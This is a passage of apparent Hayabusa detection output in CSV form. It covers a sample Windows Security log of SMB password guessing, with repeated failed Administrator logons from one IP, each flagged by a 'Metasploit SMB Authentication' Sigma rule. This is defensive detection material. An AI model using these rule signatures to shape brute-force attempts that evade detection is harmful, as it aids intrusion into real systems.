Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 